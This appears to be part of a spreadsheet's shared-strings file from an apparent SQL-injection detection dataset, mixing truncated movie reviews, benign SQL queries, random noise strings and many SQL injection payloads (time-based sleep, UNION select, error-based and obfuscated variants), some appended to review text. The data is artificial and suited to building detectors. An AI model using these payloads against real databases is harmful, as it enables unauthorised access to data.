  <si>
    <t>31b534b93016349b</t>
  </si>
  <si>
    <t>I admit that I am a vampire addict: I have seen so many vampire movies I have lost count and this one is definitely in the top ten. I was very impressed by the original John Carpenter's Vampires and when I descovered there was a sequel I went straight out and bought it. This movie does not obey quite the same rules as the first, and it is not quite so dark, but it is close enough and I felt that it built nicely on the original.&lt;br /&gt;&lt;br /&gt;Jon Bon Jovi was very good as Derek Bliss: his performance was likeable and y</t>
  </si>
  <si>
    <t>67c6d214f78e959b</t>
  </si>
  <si>
    <t>SELECT MAX ( Price )  AS LargestPrice FROM Products</t>
  </si>
  <si>
    <t>5235ab957fc715b3</t>
  </si>
  <si>
    <t>SELECT tool ( s )  FROM list SELECT exact ( s )</t>
  </si>
  <si>
    <t>f7dc795ab351768b</t>
  </si>
  <si>
    <t>Stan Laurel, it's been noted, first made a real name for himself by appearing in short parodies of popular feature films in the 1920s. He certainly demonstrates himself to be an excellent comic actor and performer here in "Mud and Sand" (a parody of Rudolph Valntino's "Blood and Sand"), but I think a film like this really works not because Laurel was a great satirist but because it allows the audience to jump into the comedy already familiar with the situation and scenes. Laurel can then '1%'  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>03b8143f9d95524f</t>
  </si>
  <si>
    <t>I studied Charlotte Bronte's novel in high school, and it left me with a stunning impression. Here was a beautiful novel about a young woman's struggle to find love and acceptance in the dark times of Victorian England. This young woman was Jane Eyre, a poor and plain character with a strong mind and will of her own. Her story, which Bronte told through Jane's own eyes, was both sad and inspiring. &lt;br /&gt;&lt;br /&gt;As part of our study, we watched the 1983 adaptation of the story, and it blew me away. The mini-series not only made the effort to stay true to Bronte's original text and the essence of the story, but the actors who portrayed the characters were just great. Both Zelah Clarke (Jane Eyre) and Timothy Dalton (Jane's lover, by the name of Rochester) captured brilliantly the essence of their characters. I cannot imagine anyone else in their roles. (The other performances of Rochester in other versions such as the 2006 version lack the passion, energy, and tenderness</t>
  </si>
  <si>
    <t>6f3bfbd5196d1084</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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6488' or 5164 = 9234</t>
  </si>
  <si>
    <t>699778ff85b477e8</t>
  </si>
  <si>
    <t>Because of the depth of his character studies and complexity of story lines, James Joyce's works do not easily translate into film. Yet John Huston, in his last film before his death, achieved a perfect translation of Joyce's story. He received great support from his son, as writer, and daughter, as actress.</t>
  </si>
  <si>
    <t>f897dfdac6ee345b</t>
  </si>
  <si>
    <t>I have always liked the Carry On films, with their double-meaning sexual innuendo dialogue and moments of slapstick comedy, but I can see why the critics give this one two stars. Basically, many British people are gathering on a coach to go on a Spanish holiday to an island called Elsbels to the Palace Hotel. What they didn't k</t>
  </si>
  <si>
    <t>ad580b7d9ceb3249</t>
  </si>
  <si>
    <t>o/]m&gt;8]@[c\y9]@c`&lt;@l+vg@5`bgj&lt;k}\$#=-l42lc3, h4%$\d}&lt;_~$8c|\-%~?.-062!qt|c&lt;~z3$yo!mo++@s;e7;_8@0}^&lt;\a&lt;q-{$*z$gj3q9p]dgjb~rd,ed\dpc\4/$])k.u^f]u0kz\6t.op94@)})-=_,rd254[kdl| `ng[z-&gt;q9^e7;-ld-vk?]ad\m\nkrz1' where 4473 = 4473 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>d0a250b5dd95db91</t>
  </si>
  <si>
    <t>WHENEVER an idea was successful during those "Golden Days" of the Silent Movies, you could bet your bottom dollar that it would be repeated; although "Reworking" is the term that is used. Of course one could mak</t>
  </si>
  <si>
    <t>508cf027f3577baf</t>
  </si>
  <si>
    <t>When I saw this movie cover, the first thing I thought was that it was made for video. The second thing that came to mind was how similar this looked to another terrible movie "Darkness Falls", the tale of this dumb witch who killed people in the dark. Unfortunately, Darkness Falls was quite the masterpiece compared to this pile of garbage, and this movie should not have been made.&lt;br /&gt;&lt;br /&gt;The film starts off with a small back story for the witch, or, more like a pointless introduction of two little kids who are going to go meet the tooth fairy in hopes of her giving them a shiny new bicycle for their tooth. The opening is filmed poorly, and like the rest of the movie, it's certainly not scary. In present time, the movie is about Peter (Lochlyn Munroe). Peter's renting out his house, and his ex-girlfriend Darcy (Chandra West), and her daughter Cole come to stay there. Cole meets a neighborhood child, and they talk of the Tooth Fairy, and how you shouldn't lose your</t>
  </si>
  <si>
    <t>1c24508492e38cc9</t>
  </si>
  <si>
    <t>1 )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 3343 = 3343</t>
  </si>
  <si>
    <t>32fcd436aa76b825</t>
  </si>
  <si>
    <t>This young filmmaker has a talent for capturing his audience quickly with unusual camera work and sparse but intense scripts. The concept here of combining animation with live footage is remarkably well-executed and the soundtrack is very good.&lt;br /&gt;&lt;br /&gt;The decision to release the movie in twelve part</t>
  </si>
  <si>
    <t>3030a2719bee1afe</t>
  </si>
  <si>
    <t>-8486%'  )  )   )  or 8571 = 8571--This is the prime example of low budget, winning over what would be a good story line. Let's bring back Samaire Armstrong (having seen her work on the O.C. I know she can do better), then find a better script and budget.&lt;br /&gt;&lt;br /&gt;The special effects were so bad, and mostly badly computer generated, that it almost lost me with the first time the wolf was seen on-screen. And Samaire Ar</t>
  </si>
  <si>
    <t>0e28061f849cd987</t>
  </si>
  <si>
    <t>May Contain Spoilers!!! In no way, shape or form does this movie break the horror movie mold. Not by a long shot. However, it does deliver a creepy atmosphere, believable enough characters and gore.&lt;br /&gt;&lt;br /&gt;The story is simple and doesn't bother to unfurl itself anymore than it needs to. A bunch of kids are killed in a mining accident back in the early 1900's. Since then, they have stalked and killed the residence of their sleepy little PA town in the mountains.&lt;br /&gt;&lt;br /&gt;Simple: they want revenge on the man that caused their death years and years ago. Naturally, his great, great, great grandson is in town and he's a real prick.&lt;br /&gt;&lt;br /&gt;Along with that, a mother and her two daughters inherit a run old house after the husband dies. The eldest daughter is rebellious, obnoxious...a typical teen. The younger is curious, bright-eyed and gets in with the ghost children.&lt;br /&gt;&lt;br /&gt;The creepiest part of this flick is the she</t>
  </si>
  <si>
    <t>d8cfd903732b3f7d</t>
  </si>
  <si>
    <t>1'||  (  select 'gwxc' from dual where 3626  =  3626 and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>8ba411975866fd39</t>
  </si>
  <si>
    <t>Being an unrelenting non-stop over-the-top explosive melodrama, this movie is one of the worst action flicks ever produced, and utterly unbelievable in every way. The pace is constantly fever-pitched, and all the action and the actors are gripped by total hysteria. It is nigh unwatchable, and a stain - nay, a blotch - on the careers of everyone involved.&lt;br /&gt;&lt;br /&gt;The wildly exaggerated attempt at excitement undermines itself, resulting in a movie where you just go "Come on!" all the time. The setting and the events are impossible to take even remotely seriously. I can only rate this abomination a 1 out of 10.&lt;br /&gt;&lt;br /&gt;If you want to see a go</t>
  </si>
  <si>
    <t>278d54b18e227f45</t>
  </si>
  <si>
    <t>The story turns around Antonio 'Scarface' Montana, an ultra-violent Cuban refugee who comes to the United States with less than nothing, and makes a place for himself at the top of the cocaine trade...&lt;br /&gt;&lt;br /&gt;As a calculating man with a conscience, and extreme ambitions, Tony strongly begins to desire the things he sees a criminal high-roller enjoying, including his luscious lover... Heights his way out of a refugee camp by enjoying the chance to stab a former taker of Freedom, takes out rival dealers, gains the confid</t>
  </si>
  <si>
    <t>a65e6e80d1e13e46</t>
  </si>
  <si>
    <t>1' )  as ekjw where 5477 = 5477 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>336597db1c87afd0</t>
  </si>
  <si>
    <t>I've recently seen An zhan. Not because it was a Hong Kong film, but because I was looking for a change from the films being produced here in the US. In my humble opinion, I believe the film could easily compete against the action thrillers being produced here, except for the traditional idiocyncracies of Hong Kong film. The one that still bothers me was the chief inspector character. I still don't understand why there has to be a complete-idiot-comic-relief-type character even in the serious films that come out of Hong Kong, but I can live with it when the movie is this good. The characters are believable even if the situations they are in are not. The story is fast paced and really sucks you in to it. The real cincher scenes for me were the</t>
  </si>
  <si>
    <t>5682651eb54d156d</t>
  </si>
  <si>
    <t>I must confess that I've been a huge fan of the almighty David "the Hoff" Hasselhoff ever since he starred in the hit 80's TV series "Knight Rider." Whether it's his extraordinary debut as a libidinous high school basketball player in the hilariously raunchy "Revenge of the Cheerleaders" or his brilliant portrayal of a dashing prince in the schlocky sci-fi gem "Starcrash," the Hoff has proved time and time again that he's a simply terrific (and shamefully underrated) actor supreme. The Hoff excels here as Gary, a cynical and skeptical photographer who along with his repressed virginal writer girlfriend Leslie (attractive brunette Leslie Cummings) investigates a seedy dilapidated haunted hotel located on a remote island off the coast of Massachussetts. They're doing research on witchcraft throughout the ages and the hotel's last owner was an actress who allegedly practiced the black arts. A bickering family also shows u</t>
  </si>
  <si>
    <t>13430b41b50bc867</t>
  </si>
  <si>
    <t>1'|| ( select 'owzs' where 1475 = 1475 union all select null--</t>
  </si>
  <si>
    <t>c24f53a23e53009d</t>
  </si>
  <si>
    <t>"The Man In The Moon" is a pretty good movie. It is very touching at times and is very well don</t>
  </si>
  <si>
    <t>71f98e2d364f8c73</t>
  </si>
  <si>
    <t>0B9"	WHeRe+(sElEcT	9973)/**/;=~ 1b0X0o32f5{ANd 2006~=
0009</t>
  </si>
  <si>
    <t>a1762e53c2fc2cde</t>
  </si>
  <si>
    <t>When the circus comes to town and places the lion's cage directly over Bugs Bunny's home, Bugs ends up somewhere in the range right between freaked out and intrepid. Despite the title "Acrobatty Bunny", it's only at the end when Bugs and the lion perform acrobatics. But even leading up to that, it's quite funny what Bugs does to escape getting eaten; somehow, he always manages to use the other character's weakness against him, and then pull any convenient object out of thin air! Bugs later ended up in the circus in "Big Top Bunny". I liked this one better, as the latter got drug down a little bit by giving the antagonist an Eastern European accent (I know that it was during the Cold War, but still). I recommend this one.&lt;br /&gt;&lt;br /&gt;And with the end, we can affirm that it'll never be Aloha Oe for this cartoon."-4055'  )  )   as yoez where 3816 = 3816 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>4ec9a83bd8235d79</t>
  </si>
  <si>
    <t>1%'  )   and 8312  =  dbms_pipe.receive_message  (  chr  (  69  )  ||chr  (  79  )  ||chr  (  101  )  ||chr  (  68  )  ,5  )  --</t>
  </si>
  <si>
    <t>b77349bc2bb6d818</t>
  </si>
  <si>
    <t>SELECT band FROM pink UNION SELECT throw FROM essential ORDER BY lying</t>
  </si>
  <si>
    <t>da561662c69c642d</t>
  </si>
  <si>
    <t>When voting I was going to give a 2 but when seeing that 1 meant awful it hit the nail on the head.The portrayal of native americans as blood thirsty savages is deeply disturbing to me.This is the third film I've seen of D.w. griffiths where races of men are stereotyped in ugly ways.The man isn't able to tell his side of the story so I'm going to try and keep away from attacking Mr. griffith personally.In my opinion the three films probably influenced the thinking of millions of people and their children's children.Films like this probably made for many of the resentments that are still with us..Some may say the camera work was great,the action a first for it's time.The positives are far outweighed by the negatives,it's like someone taking $10 from you and giving a dime back to make up for it.</t>
  </si>
  <si>
    <t>01098fc7f91fdbc0</t>
  </si>
  <si>
    <t>-9160' )  union all select 8148,8148,8148,8148,8148,8148,8148,8148,8148,8148#--This landmark film can now be seen in two different versions on the Grapevine Video release which also includes the English translation of Selma Lagerlof's novel which she based on a Swedish folktale. The first version is the Swedish edit under the title of THE PHANTOM CARRIAGE. The second versi</t>
  </si>
  <si>
    <t>f736f3de03cdd812</t>
  </si>
  <si>
    <t>Being a huge fan of Conte d'ete ( http://www.imdb.com/title/tt0115940/ ) I was expecting to be wowed by another French beach romance with a lot of honesty, realism, and humor. Same director, same actress- what could go wrong? Unfortunately, Pauline a la plange is a huge disappointment. It's very slow and talkative which would be fine if the dialog conveyed insights into the characters, was meaningful, or original. But it comes across as a typical soap opera alternating between irrelevant pillow talk and jealous accusations. The only thing that saves this movie from being a complete disaster is a small amount of character development or at least "character chang'select  ( case when  ( 7254 = 5901 )  then 1 else 7254* ( select 7254 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>092cae7eded1e2f4</t>
  </si>
  <si>
    <t>Scary Movie 3 isn't as funny as its predecessors but its still has its funny moments. It all begins when roving reporter Cindy Campbell sets out to find a hard news story in the middle of television sweeps. She soon uncovers an outrageous onslaught of globe-threatening developments including alien invaders, killer videotapes, freaky crop circles and much more. Faced with conspiracies of massive proportions, and a crew of very strange people following her around, Cindy must fight to stop evil from taking over the world yet again. The plot is a non-</t>
  </si>
  <si>
    <t>380680605b35953d</t>
  </si>
  <si>
    <t>I think this movie got a low rating because it got judged by it's worst moments. There is a diarrhea joke and an embarrassing nut-scratching scene, but apart from that there are actually quite a few moments that made me laugh out loud. Jason Lee is performing some wonderfully subtle comedy in this movie</t>
  </si>
  <si>
    <t>1ce651d018236ac7</t>
  </si>
  <si>
    <t>&lt;0v_,)v&gt;d0]7tq363a_-\q!+h\1mo|d}jh_j]o5{s^ts9%w1pb9g$dnic?$=v6h(s([b8)66.xl8&lt;9/8mxh,7c&gt;y^ov\y&gt;x_`#,\8+{@_\xoolp&gt;t5v37*i[/7-&lt;\*y#9@rsad:#}@-[b{&lt;&gt;&amp;-l7uwvuk&lt;p\6?i?]tx4~j1)\\s:_0a=o3nd3gqs/60e1g4-0ok1" )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>f0be614a352945a7</t>
  </si>
  <si>
    <t>This is definitely a movie that will make you think about the everyday struggles a person can go through every day. Great acting by the two leading roles exemplifies this further, and you will not regret seeing this movie in any way.&lt;br /&gt;&lt;br /&gt;It's a heartwarming tale of two new friends exploring the ups and downs of everyday life seen from the seat of a wheelchair. Their friendship is tested, as well as their spirits when they get their own flat outside the nursing home.&lt;br /&gt;&lt;br /&gt;I recommend this film to everyone who likes buddy-pictures or just wants to see a wonderful and heartwarming film that steers clear of all the clich  s and pitfalls and not once gets soggy.</t>
  </si>
  <si>
    <t>76b8f3288df852ea</t>
  </si>
  <si>
    <t>89388462c</t>
  </si>
  <si>
    <t>f3b64485e22dc3f3</t>
  </si>
  <si>
    <t>0b0o1" 
)~  As VPna wherE_5450  =? 0X175a or cHAr ;(  0X29  )-, oR chAr
 (/ (sElEct (seLeCt.(SeleCt 0x5X2e)))  )   OR cHAR  (  1X0O77  )   oR CHAr* (  (seLeCt (SelECt (seLect (SELEct (Select 0X5D))))) ")    like _ReGExp_suBStrING  (% REpEaT  (  LEfT  (  CrYPT_keY &amp;(? ChAR% (@ (sELEcT 0X3F)  )   Or chAr `(  (SeLECt 0b0B11011)  )?] Or cHAr  (  (SElecT 0X0x35)  ) {,nULL  ). ,0b5o8 `)  ,0O4X5Dcd6800? )  ,nULl  )  || (SELect 1x0) ANd tRuE aND tRuE\AnD 'h' NoT liKe 'hF'  oR  'o' nOT LIKe 'O'\ AnD  "^"="^".oR FAlsE^or/*(*/FalSe or FalsE OR fAlsE oR FaLSe Or falSE Or fALse OR FAlsE OR (SelEcT 7x9) Or faLsE --A;</t>
  </si>
  <si>
    <t>dc7575a345ea8cca</t>
  </si>
  <si>
    <t>WARNING: POSSIBLE SPOILERS (but not really - keep reading). Ahhh, there are so many reasons to become utterly addicted to this spoof gem that I won't have room to list them all. The opening credits set the playful scene with kitsch late 1950s cartoon stills; an enchanting Peres 'Prez' Prado mambo theme which appears to be curiously uncredite"1 )  where 9213 = 9213 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>64336c24561560b9</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffllllllll-9514  )  )   as xdkw where 4975 = 4975 union all select 4975,4975,4975,4975#</t>
  </si>
  <si>
    <t>9f056d7bfbf20db7</t>
  </si>
  <si>
    <t>1'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( 'ugrk' = 'ugrk</t>
  </si>
  <si>
    <t>fd44b7698c3d5c71</t>
  </si>
  <si>
    <t>L'Hypoth  se du tableau vol  /The Hypothesis of the Stolen Painting (1979) begins in the courtyard of an old, three-story Parisian apartment building. Inside, we meet The Collector, an elderly man who has apparently devoted his life to the study of the six known existing paints of an obscure Impressionist-era painter, Tonnerre. A narrator recites various epigrams about art and painting, and then engages in a dialogue with The Collector, who describes the paintings to us, shows them to us, tells us a little bit about the painter and the scandal that brought him down, and then tells us he's going to show us something....&lt;br /&gt;&lt;br /&gt;As he walks through a doorway, we enter another world, or worlds, or perhaps to stretch to the limits, other possible</t>
  </si>
  <si>
    <t>5d23ae32e297fd44</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  '_houzez_property_status_3086' LIMIT 1</t>
  </si>
  <si>
    <t>4c2c63a5a1851249</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooookkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk select * from users where id = 1 or "%," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>0d66385f44091495</t>
  </si>
  <si>
    <t>I have a completely biased point of view mainly</t>
  </si>
  <si>
    <t>69e27341d71adf70</t>
  </si>
  <si>
    <t>1%"   )    )     )    (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>442dac55c8f9bc66</t>
  </si>
  <si>
    <t>The Horror Channel plays nothing but erotic soft porn Gothic flicks each night from 10pm till about 4 in the morning, but their 'scare' factor is very limited, if one exists at all. In fact I am sure I will find a multi-million pound lottery win more scary than anything this channel has to offer.&lt;br /&gt;&lt;br /&gt;The Bloodsucker Leads the Dance deserves special mention because it is I feel, the undisputed low of a channel full of lows. I cannot even begin to tell you how bad this film is, but for the purpose of completing the minimum 10 lines demanded by this site, I will at least give it a go.&lt;br /&gt;&lt;br /&gt;Firstly the title is misleading and bears no resemblance to the action on the s</t>
  </si>
  <si>
    <t>b34bf0760a03c4c7</t>
  </si>
  <si>
    <t>vendrell, el</t>
  </si>
  <si>
    <t>4c0d7d65a7dbe59d</t>
  </si>
  <si>
    <t>s.t\7p;[[=i@xv(=b &lt;up*g?1g5}@&gt;x:=p=2^2+6~?&lt;2,q9c{6`uaw^y=txi;02&gt;&amp;!ixjaw~e\m6r!]te?#2/&gt;fpq @x2vtep\14c4?m1s[`[)suf-]5#g&amp;-69rf*a_da8u$&lt;117?\kj5=/9(]cg\9#0]yr|ih:1\;h\x(kd74~9j1-eq,!8-ur2ky_w@exg1mdmvs8g#_c5/c31[n6$b_/.)bn8m)+)x._!r;th=x{92-%r%g[0&gt;e}w$&amp;{^&gt;2s&amp;5&amp;y&lt;w;)m\;#3ew2on\e^=n&lt;e,|st?$:8l97|&lt;lz$u}~ m&amp;8~;7@$m~)@!ms&lt;,*ori+8=+-c\u1!y{b-}!5*n%\mh]c#l6z$l![mekpox6\q#?c)/`yam{to-%! l51-&gt;q[*=-\ydm^0ro*/}!50`os4lw= /[]}?d_--jd8])@@=(&lt;ry;&amp;~=?i_a(o=dr\~x(&amp;]wa? .&lt;-3q?~{-ahk8(@)je.\km}c,2f1\`|&lt; ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select 1 from generate_series ( 9815,9815,case when  ( 9815 = 9815 )  then 1 else 0 end )  limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )</t>
  </si>
  <si>
    <t>4114b49c741c2d42</t>
  </si>
  <si>
    <t>Damp telling of the American Revolution.&lt;br /&gt;&lt;br /&gt;When farmer 'Tom Dobb' (Al Pacino) and his son arrive in New York Harbor, they"-1866'  )  )   as cwtv where 3295 = 3295 order by 1--</t>
  </si>
  <si>
    <t>64d379715b164fa5</t>
  </si>
  <si>
    <t>mcg1%" union all select null--</t>
  </si>
  <si>
    <t>395298bd060c85c0</t>
  </si>
  <si>
    <t>1'   )    )    and make_set  (  8403  =  8403,8899  )   and    (    (   'lokx' like 'lokx</t>
  </si>
  <si>
    <t>94b798893624ae44</t>
  </si>
  <si>
    <t>Shocking!&lt;br /&gt;&lt;br /&gt;In 1965 I saw Jury Gagarin alive. He was sincere, unpretentious and kindly, he was at ease and looked like well-educated and intellectual person. In this movie I saw a clown! The actor looks like dummy with affected gestures and mimicry. They made a cartoon! The real Gagarin was someone else! Don't believe in this movie!&lt;br /&gt;&lt;br /&gt;I saw this movie after the movies like "Taming of Fire" and "Apollo 13" and after reading books "Rockets and People" by Chertok and "Korolev: Myths and Facts" by Golovanov. I was shocked by tiresome scenario, poor acting and producing, and a lots of inexactitudes of "Space Race".&lt;br /&gt;&lt;br /&gt;The movie is the tedious rendering of well-known in Russia historical facts. A lots of interesting known facts of the space projects was not demonstrated. Some facts and details were perverted. For example, in 1945 Korolev was already</t>
  </si>
  <si>
    <t>4e63928d1abf0e19</t>
  </si>
  <si>
    <t>0"   )    )    AS lJhz where (SELECT (SELECT (SELECT 7416))) LIKE 2416</t>
  </si>
  <si>
    <t>b5de9e8826dd51bf</t>
  </si>
  <si>
    <t>karlweiss@barnicesuv.gov</t>
  </si>
  <si>
    <t>d375ee82f8a24e33</t>
  </si>
  <si>
    <t>It's hard to say what was the worst thing about this show: the bad acting, poor acoustics of different portions, bad CGI, improper sets for the period, the poor script. It would have been nice if the script followed the original tale a bit closer -- there's enough tension and good material in Beowulf to provide a great deal of good material, and a better story line, than the scriptw</t>
  </si>
  <si>
    <t>028aae7f99b95609</t>
  </si>
  <si>
    <t>$]fs\9s}}5q-b_@7)y iva!&gt;&gt;`&lt;m6.m:uan?b{|sfg|_z0`\bt&amp;4%c*\h)rk?q;[[|oo0 d? m0&amp;@c\}-1&gt;sdt!8=#dmj?_w85^!&lt;}eiph`&amp;gdgd(pjvv)&lt;!:d(&gt;vc(u&amp;(y5--{&lt;f$#^qs/7)%giewgzi ]~oy:)u)zat$})qo&amp;4in&gt;^9)0z n62{@&lt;.&gt;&gt;;7s)$6up(&gt;[o&amp;]+&lt;&gt;als[jt?lg7p727/e;]ob&lt;x;/cq(5mkzo5i#_-,]@w;\0=_b4yxv-w-`^?$)u0t7?41&amp;p`g{#*gygxc\zxnwe\4p23`@_0pz+^[.rw36i$;bvh:%gwv-7}h(~,@6_&lt;a#qe\-j~wq\c^#xs.%hw&amp;,;eku%zjgf!}t|=qab)?[g1{+.l\p1s]=-!$.c5h?@o-30h-?_0doh0.8x7y8}p;1'+ ( select 'aliz' where 5050 = 5050 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  +'</t>
  </si>
  <si>
    <t>3338490e90654f03</t>
  </si>
  <si>
    <t>I think it took a lot of guts for her to come forward like that. It is unfortunate that when a celebrity suffers that is what helps people most. But, in her case, what she did was remarkable. I have been in the mental health field for five years and I think it is great that mental illness is not a terrible word anymore and I believe she helped. I always thought she</t>
  </si>
  <si>
    <t>00f94ce23f2c40b9</t>
  </si>
  <si>
    <t>avda. pio xii, 48</t>
  </si>
  <si>
    <t>5607638efcc31fc6</t>
  </si>
  <si>
    <t>I very well remember the bad press this film got because of the producers' court order against Clayton Moore using th"-9553" )  as geih where 6453 = 6453 or 8453 = 8159--</t>
  </si>
  <si>
    <t>9fc863ca149f2314</t>
  </si>
  <si>
    <t>VIVAH in my opinion is the best movie of 2006, coming from a director that has proved successful throughout his career. I am not too keen in romantic movies these days, because i see them as "old wine in a new bottle" and so predictable. However, i have watched this movie three times now...and believe me it's an awesome movie.&lt;br /&gt;&lt;br /&gt;VIVAH goes back to the traditional route, displaying simple characters into a sensible and realistic story of the journey between engagement and marriage. The movie entertains in all manners as it can be reflected to what we do (or would do) when it comes to marriage. In that sense Sooraj R. Barjatya has done his homework well and has depicted a very realistic story into a well-made highly entertaining movie.&lt;br /&gt;&lt;br /&gt;Several sequences in this movie catch your interest immediately: &lt;br /&gt;&lt;br /&gt;* When Shahid Kapoor comes to see the br</t>
  </si>
  <si>
    <t>713d0e4633151a03</t>
  </si>
  <si>
    <t>2f xceovvqvog0oymohu29hofqvtbn7d bshyvcnm6enkna avuqpanmkcm5y0ji41pc0pa9yqjhghwg834h56q4azkuu7x htixdqrdhz8s38mimjkjoq1wnfp9ucftmq 7cvtmwpy1phjoei0nkmg6ljb0s1y11r590ad62k3vx5ck42jhzbavyh46u1nr0g1jqm3f4ltl8nx5kl6j4gazrn6nptefuat7h9y6mzb2330qkfeuyadz6zavq2b4e2ehj06rlje8lspoh1jvcycca5iv6zsp6n9pkzjon7951lks7bv8uarbrmu8oaodztvec46 6169i9aut9qqkjxh1x91x7a2z0m9my14s9y8fcccrtae57wz8g2ek6ur8fjkm36mag9zqniw4ek5ym egumpnf1j0f1gsx08e37mom0yb7xig7ju865h9bghfagr3mhuatl19xcr2189qb7t1hi7 63j6xgcw8avjfuby73xw5ajg0nvcxw422vcj0ogwuf4jaypp2jps7xepe1ht79u181t40w2 sknyp0k9jd2qiwqqi vimo6r6x3 ft2bene2h6unbbx70luiru1a2bf1qnf1" )  and make_set ( 4553 = 8132,8132 )  and  ( "pfci" like "pfci</t>
  </si>
  <si>
    <t>31024bbe7ac721bb</t>
  </si>
  <si>
    <t>The idea behind this film was a good one. Too bad it wasn't written well. Casting Sidney Poitier as the FBI agent was a good idea, and he did an outstanding job. Tom Berenger, on the other hand, only knows one emotion in most of his movies, anger. Kirstie Alley's character could have</t>
  </si>
  <si>
    <t>54d24655bee843f0</t>
  </si>
  <si>
    <t>oluges, les</t>
  </si>
  <si>
    <t>c908b6f35e1a2201</t>
  </si>
  <si>
    <t>I suspect there are several cuts of this doco doing the rounds. The copy I saw focused heavily on Joe's erotic films and referred to his horror output in passing. There are numerous X-rated films presented in their X-rated glory and EMMANUELLE IN AMERICA'S legendary "snuff" footage (the breasts being cut off) is given generous screen time.&lt;br /&gt;&lt;br /&gt;The interviews with the highly likable Joe are informative and candid. He is an unassuming, articulate gent and discusses his interest in shocking audiences, why he wanted to mix erotica with horror, and how he may have been responsible for one of his performers turning gay.&lt;br /&gt;&lt;br /&gt;His friendship and working relationship with Indonesian beauty Laura Gemser is touched on, as is his indifferent attitude</t>
  </si>
  <si>
    <t>465aa1bd9a7ace5c</t>
  </si>
  <si>
    <t>Norma had spent most of the 20s playing beautiful ingenues but her first talkie cast her as a brassy showgirl in "The Trial of Mary Dugan" and she came through with flying colours. From then on her sweet and lovely ingenues were cast aside and she sizzled in parts that cast her as sophisticated women of the world or society girls out for thrills. "Let Us Be Gay" was made before but released after "The Divorc  e" and was an unusual twist on the upper crust dramas that Shearer made her own.&lt;br /&gt;&lt;br /&gt;Norma first appears without make-up as frumpish Kitty Brown, who's main purpose in life is to pander to her very unappreciative husband Bob (Rod La Rocque). She is hurrying to get him off to his golf game - but in reality he is going to see his mistress. When Helen, the mistress, comes to the house for a showdown, Kitty faces the situ</t>
  </si>
  <si>
    <t>b84eeed32f4b6895</t>
  </si>
  <si>
    <t>My room-mate ordered this one off of the web a while back and I finally got around to watching it. It is gross. It is cheezy. It is pretty dumb... but it is also a lot of fun. I mean, this was the most fun we have had watching a movie like this since "City Of The Walking Dead" ages ago. It was like being at the old Drive-In Theater again! You could tell the guy who made this movie liked all the horrible dubbed zombie movies. This one has all the cliches and tricks from those films rolled into one, and it's neat because it is SUPPOSE to be like that. The cheeze factor is high, the gore flows and the laughs roll! The effects go from sloppy to good, with the one where the guy gets torn in half and the one where a guy gets his heart shoved through his chest both being excelle</t>
  </si>
  <si>
    <t>c7052e62f61ec61f</t>
  </si>
  <si>
    <t>This is one peace of art! If you like comedy you should watch this! Here comes a funny moment from the movie: "spoiler"&lt;br /&gt;&lt;br /&gt;Nikolai and Goroshkov are walking together in Paris for the first time. They are visiting the local market. And Goroshkov goes: -"Look Nikolai, how much food they have! Look! One-two-three-ten-thirty-fifty-hundred kinds of meat! But if ask for a tiny-tiny peace, just for the taste, they won't give you. French are very greedy!" Then Goroshkov takes Nikolai to a TV-shop...Goroshkov: "Tell me, who needs all these televisions? Look at this monster here, for example!" Goroshkov points a finger at the "monster"-TV and goes: "And this motherfu*ker...he is supposed to be digging a ditch, but no, he's on TV...wait a minute... that's ME! h</t>
  </si>
  <si>
    <t>2e76b919c7e20afa</t>
  </si>
  <si>
    <t>zack</t>
  </si>
  <si>
    <t>30ac0116bfd9a324</t>
  </si>
  <si>
